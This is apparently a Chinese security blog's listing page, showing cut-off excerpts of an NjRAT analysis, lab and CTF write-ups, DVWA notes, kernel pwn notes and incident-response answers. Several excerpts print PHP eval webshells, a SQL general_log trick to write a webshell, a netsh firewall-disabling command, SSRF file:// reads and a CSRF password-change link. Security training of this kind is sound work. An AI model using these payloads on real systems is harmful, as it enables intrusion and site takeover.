NjRAT 样本分析
1. 概述NjRAT(又称为 Bladabindi)是一款带有图形用户界面(GUI)的远程访问工具(RAT),允许攻击者远程控制和监视受害者计算机,进行键盘记录、截图捕获、文件操作和数据窃取。该恶意软件以其广泛的功能而闻名,被用于各种网络犯罪活动。
最早的 NjRAT 由一个名为 M38dHhM 的组织创建,该组织据信位于阿拉伯语国家,主要针对中东地区。自 2013 年其源代码泄露后,出现了多个修改版本,包括但不限于:
NjRAT 0.7d Danger Edition
NjRAT 0.7d Golden Edition
NjRAT 0.7d Green Edition
NjRAT Lime Edition
2. 环境配置在此次分析中,我们采用的 NjRAT 变种为 NjRAT 0.7d Green Edition。
Github 仓库链接:https://github.com/XAKEP-1lly/NjRat-0.7D-Green-Edition-by-im523
2.1 环境搭建本实验共使用三台虚拟机:其中两台运行于 Hyper-V 的 Windows 10 Pro x ...
愚安科技二面靶场WriteUp
二面过程记录文档
WEB1FLAG1先测试目标站点功能,发现并未对用户的输入进行过滤,可以发起任意的内网或者外网的请求,推测存在SSRF
外网:
内网:
使用 file 协议file:///flag读到根目录的flag
meetsec-web1{flag1-6d5e5c2bb397ba7727b58df59b35f66a}
FLAG2再尝试获取存在 SSRF 漏洞的本机内网 IP 地址信息,内网网段是172.18.240.0/24
123456789file:///etc/hosts 的快照如下:127.0.0.1 localhost::1 localhost ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02::1 ip6-allnodesff02::2 ip6-allrouters172.18.240.5 17b86b8e3c70
写一个python脚本,通过dict协议探测内网服务:
123456789101112131415161718192021222324252627282 ...
红日靶场
红日靶场-ATT&CK实战(一)配置如图
nmap扫描我们部署Web服务的主机
有两个开放的端口,扫描其对应挂载的服务
爆破路径
存在后台登录页面:http://192.168.72.128/phpMyAdmin/
尝试弱口令(root/root)成功登录:
查询MySQL数据库的通用日志
得到路径C:\phpStudy\MySQL\data\stu1.log下的日志文件
我们考虑将日志文件放到站点根目录,并改为.php文件后缀
构造sql查询,通过sql查询往日志文件中写入我们的php命令,进而get shell提权
这里需要注意开启general_log读取功能,使我们每一条查询都出现在日志文件里面,这样才能成功写php日志马
1SET GLOBAL general_log='on';
输入构造的shell命令:SELECT '<?php eval($_POST["shell"]);?>'
蚁剑成功连上
尝试关掉防火墙(建议手敲命令进去):
123netsh advfirewall set ...
Linux Kernel Pwn 学习笔记
Linux Kernel Pwn 学习笔记Basic Intro内核漏洞利用的特点简单介绍 Kernel Pwn 和 User-Space Pwn 两者间的区别。
攻击目标二者最大区别在于攻击目标的不同。
以往我们遇见的用户态Pwn大多以 “命令执行” 为目标编写漏洞利用程序。而内核态Pwn则通常以 “提升权限” 为目标编写漏洞利用程序。在假设攻击者已通过某种手段入侵目标机器的前提下,攻击者利用内核漏洞进一步获取root权限。类似于这样在本地机器上进行权限提升的行为,被称为 LPE (Local Privilege Escalation,本地提权) 。
当然,用户态中也存在可以提升权限的漏洞,但这是因为攻击目标的程序以特权用户身份运行的。在内核漏洞利用中,主要攻击目标有以下两种:
Linux内核
内核模块(Loadable Kernel Modules - LKMs)
Linux内核中的代码(系统调用、文件系统等)以root权限运行,因此当内核本身存在缺陷时,可能导致LPE(本地权限提升)漏洞。
另一类是包含在设备驱动程序等内核模块中的漏洞。设备驱动程序是用于简化用户空间与外部设备 ...
Tenda-AC 路由器漏洞复现
Tenda-AC 路由器漏洞复现Tenda-AC6 路由器固件Tenda AC6 V15.03.05.19 路由器
固件下载:https://www.tenda.com.cn/material/show/102681
Tenda-AC15 路由器固件Tenda AC15 V15.03.1.16 路由器
固件下载:https://www.tenda.com.cn/download/detail-2680.html
基础环境配置创建Python虚拟环境目录
1cd ~/Pwn/IoT
创建虚拟环境
1python3 -m venv IoT
激活虚拟环境
1source IoT/bin/activate
binwalk安装
https://github.com/ReFirmLabs/binwalk/wiki/Compile-From-Source
参考github教程
firewalker 安装1git clone https://github.com/craigz28/firmwalker/
sasquatch SquashFS 安装123sudo apt-get install zli ...
DVWA 靶场笔记
DVWA 靶场笔记Brute Force登录框,Burp抓包,放到Intruder爆破即可,根据响应包的长度得到正确的密码
Command Injection首先查看源码
请求参数 ip 会直接被拼接到 shell_exec 函数的 ping 命令中
通过构造恶意输入再传递给 shell_exec 函数,进行命令注入攻击
Cross Site Request Forgery (CSRF)该页面的链接,点击后即可修改掉用户密码,没有任何校验
可以构造恶意网站,诱导受害者点击,即可修改TA的密码
123<a href="http://198.18.0.1/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" /> <img src="http://127.0.0.1/tupian.jpg" border="0" width="800" height="60 ...
春秋云境 靶场笔记
春秋云境 靶场笔记CVE-2022-32991登录页面
任意注册账户登录
访问 welcome.php:http://eci-2zeddrs0sa8uwhp5l5n9.cloudeci1.ichunqiu.com/welcome.php?q=1
存在参数 q,尝试 sql 注入
Burp 抓包:
123456789101112131415GET /welcome.php?q=1 HTTP/1.1Host: eci-2zeidk6onhgzoxoik7ds.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brReferer: http://eci-2zeidk6on ...
玄机应急响应WriteUp
第一章 应急响应- Linux入侵排查
web目录存在木马,请找到木马的密码提交
打包/var/www/html目录下的文件:
tar -cvf archieve.tar .
D盾扫描得到木马路径:\archive\www\html\1.php
1<?php eval($_POST[1]);?>
flag:flag{1}
服务器疑似存在不死马,请找到不死马的密码提交
查看D盾结果中已知后门:\archive\www\html\index.php,每隔usleep(3000);生成一次.shell.php
1<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>
md5解密得flag:flag{hello}
不死马是通过哪个文件生成的,请提交文件名
由 2问 得:flag{index.php}
黑客留下了木马文件,请找出黑客的服务器ip提交
同路径下shell(1). ...
VSEC 车联网安全 CTF 挑战
Getting StartedCan you find the interface?输入 ifconfig,根据 CAN 接口的命名规则(canX、vcanX、slcanX)判断 vcan0 是对应的 can 接口
flag:vcan0
Arbitration利用 candump 命令可捕获到 CAN 总线传输的数据流,其中,内容分别为:sniffer device | arbitration ID | size of the CAN packet | CAN data itself
123456b9c80e7d115e:~$ candump vcan0 vcan0 59E [2] 9E 10 vcan0 59E [2] 9E 10 vcan0 59E [2] 9E 10 vcan0 59E [2] 9E 10 vcan0 59E [2] 9E 10
CAN 数据流通过 Arbitration ID 标记每一条消息
这里周期性消息的 Arbitration ID 是 59E
flag:59E
Data Field 1数据流中 Arbit ...
WSL2 Pwn环境部署
Install
在 Microsoft Store 搜索 Ubuntu 安装 (建议安装22.04,其他版本可能存在适配等未知bug)
1wsl --set-default Ubuntu-22.04
在 Windows 功能中启用适用于 Linux 的 Windows 子系统
PowerShell 输入命令:
1Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
1dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
基本环境配置更新软件包列表123sudo dpkg --add-architecture i386 # 添加32位支持库sudo apt update && sudo apt -y upgradesudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i3 ...









